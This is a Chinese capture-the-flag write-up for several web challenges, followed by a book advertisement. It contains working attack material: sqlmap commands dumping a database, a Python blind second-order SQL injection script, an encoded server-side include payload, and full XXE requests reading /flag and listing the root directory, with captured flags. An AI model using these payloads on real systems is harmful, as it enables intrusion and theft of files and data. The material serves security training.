内容简介:SimpleBBS1.登录处报错
SimpleBBS
题目解析:
1.登录处报错
2.导出burp的包使用sqlmap进行测试
sqlmap -r bbs.txt --dbs
available databases [2]: [*] bbs [*] information_schema
sqlmap -r bbs.txt -D "bbs" --tables
Database: bbs [7 tables] +----------+ | admin | | articles | | comments | | flag | | messages | | sections | | users | +----------+
sqlmap -r bbs.txt -D "bbs" --tables
Database: bbs [7 tables] +----------+ | admin | | articles | | comments | | flag | | messages | | sections | | users | +----------+
sqlmap -r bbs.txt -D "bbs" -T "flag" -C "f" --dump
# 测试的时候已经没有flag了.... Database: bbs Table: flag [1 entry] +---------+ | f | +---------+ | <blank> | +---------+
SimpleBlog
题目描述:
SimpleBlog
题目解析:
刚开始一直再找文件包含想看下源码,后来是在找不到就认真做了下题目。发现直接二次注入就好了,如果注入内容存在后面做题的分数会为0。
import requests
import string
import urllib
flag=""
register = 'http://210.32.4.20/register.php'
login = 'http://210.32.4.20/login.php'
answer = 'http://210.32.4.20/answer.php'
logout = 'http://210.32.4.20/logout.php'
for i in range(3,50):
for j in range(32,126):
print "i:",chr(i),"j",chr(j)
req = requests.session()
payload = "\' or if((ascii(substr((select flag from flag),"+str(i)+",1))="+str(j)+"),1,0)='1' or \'"
post_answer = {'1.a':'on'}
login_data = {'username':urllib.quote(payload),'password':'zeroyu'}
r = req.post(register,data=login_data)
lin = req.post(login,data=login_data)
ans = req.post(answer,data=post_answer)
if 'Your grades is 0' not in ans.content:
f=chr(j)
print f
flag=flag+f
print flag
break
lout = req.get(logout)
SimpleServerInjection
题目描述:
SimpleServerInjection, SSI, flag in current directory
题目解析:
了解到是ssi,提示了读flag文件,常规payload发现 # 号后内容被截断,于是采用编码绕过。
payload
<!--%23include+virtual%3D"flag"+-->
参考:
https://junookyo.blogspot.com/2012/03/shtml-bypass-view-symlink-server-side.html
https://www.secpulse.com/archives/66934.html
http://xdxd.love/2015/12/09/ssi%E6%BC%8F%E6%B4%9E%E4%BB%8B%E7%BB%8D/
SimpleExtensionExplorerInjection
题目描述:
SimpleExtensionExplorerInjection, XXE, /flag
http://210.32.4.21:8080/www/index.html
题目解析:
1.burp抓包发现采用json格式传输数据
2.修改 Content-Type 字段为 xml ,尝试post xml格式数据
根据请求和响应发现存在xxe漏洞
请求
POST /www/ HTTP/1.1 Host: 210.32.4.21:8080 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.13; rv:63.0) Gecko/20100101 Firefox/63.0 Accept: */* Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 Accept-Encoding: gzip, deflate Referer: http://210.32.4.21:8080/www/index.html Content-Type: application/xml; charset=UTF-8 Content-Length: 73 Connection: close <?xml version="1.0" encoding="UTF-8" ?> <name>zzz</name> <age>zzz</age>
响应
HTTP/1.1 500
Content-Type: application/json;charset=UTF-8
Date: Fri, 16 Nov 2018 09:17:40 GMT
Connection: close
Content-Length: 254
{"timestamp":"2018-11-16T09:17:40.797+0000","status":500,"error":"Internal Server Error","message":"org.xml.sax.SAXParseException; lineNumber: 3; columnNumber: 2; The markup in the document following the root element must be well-formed.","path":"/www/"}
3.依据提示 /flag ,直接去读文件
请求
POST /www/ HTTP/1.1 Host: 210.32.4.21:8080 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.13; rv:63.0) Gecko/20100101 Firefox/63.0 Accept: */* Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 Accept-Encoding: gzip, deflate Referer: http://210.32.4.21:8080/www/index.html Content-Type: application/xml; charset=UTF-8 Content-Length: 151 Connection: close <?xml version="1.0" encoding="UTF-8" ?> <!DOCTYPE netspi [<!ENTITY xxe SYSTEM "file:///flag" >]> <root> <name>name</name> <age>&xxe;</age> </root>
响应:
HTTP/1.1 200
Content-Type: text/plain;charset=UTF-8
Content-Length: 64
Date: Fri, 16 Nov 2018 09:21:23 GMT
Connection: close
Received name: name, age: EIS{bce52c116d589ae9472e59a162cc90e2}
参考:
https://blog.netspi.com/playing-content-type-xxe-json-endpoints/
https://thief.one/2017/06/20/1/
SimplePrintEventLogger
题目描述:
SimplePrintEventLogger, same server as SimpleExtensionExploreInjection , RCE, flag in /
http://210.32.4.21:8080/www/index.html
题目解析:
同一个题目的服务器上,flag在根目录,手动翻一下就好
请求
POST /www/ HTTP/1.1 Host: 210.32.4.21:8080 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.13; rv:63.0) Gecko/20100101 Firefox/63.0 Accept: */* Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 Accept-Encoding: gzip, deflate Referer: http://210.32.4.21:8080/www/index.html Content-Type: application/xml; charset=UTF-8 Content-Length: 147 Connection: close <?xml version="1.0" encoding="UTF-8" ?> <!DOCTYPE netspi [<!ENTITY xxe SYSTEM "file:///" >]> <root> <name>name</name> <age>&xxe;</age> </root>
响应
HTTP/1.1 200 Content-Type: text/plain;charset=UTF-8 Content-Length: 169 Date: Fri, 16 Nov 2018 16:46:04 GMT Connection: close Received name: name, age: .dockerenv bin boot dev docker-java-home etc flag flagvvvvvaaaagegsgag2333 home lib lib64 media mnt opt proc root run sbin srv sys tmp usr var
读取 flagvvvvvaaaagegsgag2333
请求
POST /www/ HTTP/1.1 Host: 210.32.4.21:8080 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.13; rv:63.0) Gecko/20100101 Firefox/63.0 Accept: */* Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 Accept-Encoding: gzip, deflate Referer: http://210.32.4.21:8080/www/index.html Content-Type: application/xml; charset=UTF-8 Content-Length: 171 Connection: close <?xml version="1.0" encoding="UTF-8" ?> <!DOCTYPE netspi [<!ENTITY xxe SYSTEM "file:///flagvvvvvaaaagegsgag2333" >]> <root> <name>name</name> <age>&xxe;</age> </root>
响应
HTTP/1.1 200
Content-Type: text/plain;charset=UTF-8
Content-Length: 64
Date: Fri, 16 Nov 2018 16:47:38 GMT
Connection: close
Received name: name, age: EIS{f501e9c5323c560b0a40192ce9b7ad38}
以上就是本文的全部内容,希望对大家的学习有所帮助,也希望大家多多支持 码农网
猜你喜欢:
本站部分资源来源于网络,本站转载出于传递更多信息之目的,版权归原作者或者来源机构所有,如转载稿涉及版权问题,请联系我们。
深入浅出程序设计(中文版)
Paul Barry、David Griffiths / 蒋雁翔、童健 / 东南大学出版社 / 2012-1 / 98.00元
《深入浅出程序设计(中文版)》介绍了编写计算机程序的核心概念:变量、判断、循环、函数与对象——无论运用哪种编程语言,都能在动态且多用途的python语言中使用具体示例和练习来运用并巩固这些概念。学习基本的工具来开始编写你感兴趣的程序,而不是其他人认为你应该使用的通用软件,并对软件能做什么(不能做什么)有一个更好的了解。当你完成这些,你就拥有了必要的基础去使用任何一种你需要或想要学习的语言或软件项目......一起来看看 《深入浅出程序设计(中文版)》 这本书的介绍吧!
